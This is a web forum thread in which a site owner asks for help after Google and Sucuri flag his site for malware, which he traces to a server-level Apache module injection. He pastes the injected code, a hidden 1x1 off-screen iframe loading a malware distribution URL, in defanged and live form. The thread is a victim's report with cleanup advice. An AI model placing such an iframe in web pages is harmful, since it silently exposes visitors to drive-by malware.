Digiweb servers hacked!

kipple

I got a message from Goggle informing me that there was malware on mywebsite. My web site is http://dublinrolfing.com

I coded this site myself but I noticed a suspicious .php file and deleted the google analytics code and it looked like the malware was vanquished.

Got a new email from google today again informing me that there was malware on my website.

I checked with http://sitecheck.sucuri.net/scanner/ it found malware. Checked my code found nothing and checked again with sucuri it was clean. Checked later not clean and then clean again.

I was very confused until I found this:

The first sign of this injection can be identified remotely by an iframe injection like this one:

<iframe src=httpx://ajaxfamilies[.]org/go[.]php?sid=3 width=1 ..

That gets randomly prepended at the top of the pages loaded from the compromised server. That injection is conditional, so depending on the browser, referrer or IP address it may not show up. Google also says that 500+ sites have been distributing malware through this domain (ajaxfamilies.org):

From this link
http://blog.sucuri.net/2013/06/new-apache-module-injection.html


This has now been going on since at lest June 15. My other web site is clean but I know it is hosted on another server.


Any advice on how to get my site clean????



Note:
Here is the sucuri security warning for my site.

Hidden Iframes.
Details: http://sucuri.net/malware/entry/MW:IFRAME:HD202
<iframe src=http://ajaxfamilies.org/go.php?sid=3 width=1 height=1 style="visibility:hidden;position:absolute;top:-10;left:-1337;">

yoyo

Sorry but we can't allow discussion about web hosting providers on here. Make sure to properly quarantine your website, checking all scripts/htaccess files etc. for any suspicious entries. Your web host may be able to help fix this

Nick